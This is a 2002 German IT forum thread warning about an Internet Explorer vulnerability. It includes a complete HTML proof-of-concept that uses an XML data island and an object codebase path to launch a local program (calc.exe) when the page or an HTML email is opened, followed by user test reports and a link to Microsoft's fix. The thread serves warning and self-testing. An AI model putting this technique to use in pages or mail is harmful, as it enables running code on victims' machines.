Microsoft MVPs inside





 MCSEboard.de – IT Pro Forum zu Windows Server 2008 R2 / 2008 / 2003 & Windows 7 / Vista / XP
Registrieren Hilfe Regeln Benutzerliste Suchen Heutige Beiträge Alle Foren als gelesen markieren

Tipps & Links


Tipps, Links und Wissenswertes zum Thema Windows Client und Server
Bitte nur Tipps und Links posten!


Antwort
     
Themen-Optionen
Alt 05.03.2002, 11:08   #1
Moderator
 
Benutzerbild von Lian
 
Offline
Registriert seit: 11-2000
Beiträge: 16.069
Achtung IE Exploit

Hallo allerseits,

seit längerem ist ein exploit für den Internet Explorer ab der Version 5.5 bekannt.

Seit kurzem kann dieser exploit auch ohne Active Scripting oder ActiveX ausgeführt werden:
http://heise.de/newsticker/data/pab-04.03.02-001/

Ist nicht ganz ohne, probiert dringend mal den Browsercheck aus:

http://www.heise.de/ct/browsercheck/e5demo10.shtml


Um das ganze lokal zu testen kopiert einfach folgenden text in einen Datei test.html:


PHP-Code:
<HTML>
<
head><title>none</title></head>
<
body>
<
span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<
xml id="oExec">
    <
security>
        <
exploit>
            <![
CDATA[
            <
object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
            ]]>
        </
exploit>
    </
security>
</
xml>
</
body
</
HTML

Einzig der Pfad in codebase zu c:/winnt/system32/calc.exe muss stimmen.

Falls der Taschenrechner hochkommt, ist das ... nicht gut

Weil die Sicherheitslücke unabhängig von den Einstellungen die Interpretation von HTML-Seiten betrifft, sind auch Outlook und Outlook Express mit hohen Sicherheitseinstellungen von dem Problem betroffen. Eine einfache HTML-Mail kann somit beim Öffnen oder in der Vorschau ein Programm starten. Von Microsoft gibt es bislang noch keine Stellungnahme oder einen Patch. (pab/c't)

Signatur
MVP [Data & Storage - Cluster]

Two hours of trial and error can save ten minutes of manual reading.

    Mit Zitat antworten
Alt 26.04.2002, 19:14   #2
Member
 
Benutzerbild von ZapNDustER
 
Offline
Registriert seit: 06-2001
Beiträge: 228
Das ist ja mal heftig, habe die zeilen in ein html kopiert und in ie geöffnet - dann kommt der taschenrechner hoch

Signatur
ZZzzzap! - Stefan

    Mit Zitat antworten
Alt 31.05.2002, 09:27   #3
Member
 
Offline
Registriert seit: 01-2001
Beiträge: 128
Hallo zusammen.

Hab es mal ausprobiert. Klappt wirklich, und dass mein Anti-Viren-Programm und der VirenGuard, nicht angeschlagen hat, trotz dem aktuellsten Update vom 29.05.02, finde ich schon bedenklich...

Wie kann man sich davor schützen???

Gruss Micha
    Mit Zitat antworten
Alt 09.07.2002, 20:02   #4
Moderator
 
Benutzerbild von Lian
 
Offline
Registriert seit: 11-2000
Beiträge: 16.069
Fix verfügbar

Sorry, habe den Fix verschlafen, hier ist er:
http://www.microsoft.com/windows/ie/...32/default.asp

Signatur
MVP [Data & Storage - Cluster]

Two hours of trial and error can save ten minutes of manual reading.

    Mit Zitat antworten
Alt 10.12.2002, 21:11   #5
Newbie
 
Offline
Registriert seit: 12-2002
Ort: NRW
Beiträge: 2
Ich weiss leider nicht wie es sonst hier gehandhabt wird, deshalb einfach mal das was bei mir beim ausprobieren mit dem "Html-code" passiert ist.
Ich hab nen WinXP Pro. rechner mit IE 6 und SP1 für den IE, was aber nicht hilft soweit ich weiss... ;-)

Aber Norten AV 2003 mit neuester Virensignatur von vor 3 Tagen, hat sofort angeschlagen, als ich diese Datei nur Speicherrn wollte!!!

Gruß helpless

Signatur
Nicht böse sein, ich weiss es halt nicht besser

    Mit Zitat antworten
Alt 11.12.2002, 08:42   #6
Moderator
 
Benutzerbild von marka
 
Offline
Registriert seit: 11-2002
Ort: kurz vor Sylt
Beiträge: 5.022
Hinweis aktuelle c't

Hi @all:
Erstmal Danke an Lian für den Hinweis!
In der aktuellen c't steht ein ausführlicher Artikel über Sicherheitslöcher (Lücken sind das wohl nicht mehr, eher "Polen offen") und deren Bekämpfung sowie Browseralternativen.

Signatur
Grüße von der Nordsee
Markus


Kennt Ihr das TSP - Prinzip in Communities?
First thinking, second searching, last posting!

Kein Support per PN oder E-Mail, bitte im Forum posten, dann haben alle etwas davon

    Mit Zitat antworten
Alt 12.12.2002, 15:55   #7
Newbie
 
Offline
Registriert seit: 12-2002
Beiträge: 12
Original geschrieben von helpless
Aber Norten AV 2003 mit neuester Virensignatur von vor 3 Tagen, hat sofort angeschlagen, als ich diese Datei nur Speicherrn wollte!!!
Aha! Das ist seltsam! Weil bei mir nix passiert ist!
Das neuste Update hatte ich auch drauf!
Mhhh sollte mir zu denken geben.
    Mit Zitat antworten
Alt 15.12.2002, 11:22   #8
Expert Member
 
Benutzerbild von McAbflug
 
Offline
Registriert seit: 09-2002
Ort: Leipzig
Beiträge: 1.084
stimmt, bei mir passierte auch nix, Virendefinitionen sind nagelneu und der Taschenrechner wird ohne Probleme gestartet?!
Da sollte ich wohl doch wieder öfter mit Opera surfen?

Signatur
VCP for VI3 #28496

    Mit Zitat antworten
Alt 15.12.2002, 11:49   #9
Expert Member
 
Benutzerbild von networker31
 
Offline
Registriert seit: 07-2002
Ort: Zwischen Rhein und Lahn
Beiträge: 757
O.K., mein Norton AV 2003 hat die datei auch beim speichern gekillt !
Beim Browser-Check passiert auch nix, Safty-first !!

Signatur
Never stop a running system an RTFM

MCSE Win2K
CompTia+ Server
HP

    Mit Zitat antworten
Antwort


Themen-Optionen


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Zero-Day-Exploit für Internet Explorer 7 arminkoehler Windows Forum — Security 4 18.12.2008 08:16
Excel 2000 Exploit overlord Windows Forum — Security 0 23.06.2006 08:06
RRAS Exploit overlord Windows Forum — Security 0 23.06.2006 08:01
JPEG Exploit in PDF Files? Schorschinio Windows Forum — Allgemein 3 29.09.2004 07:15


Alle Zeitangaben in MEZ/CET. Es ist jetzt 02:05 Uhr. Seite generiert in 0,041 Sekunden.

- Unsere Partner -

Copyright © 2000 – 2012 MCSEboard.de

Sprung zum Seitenanfang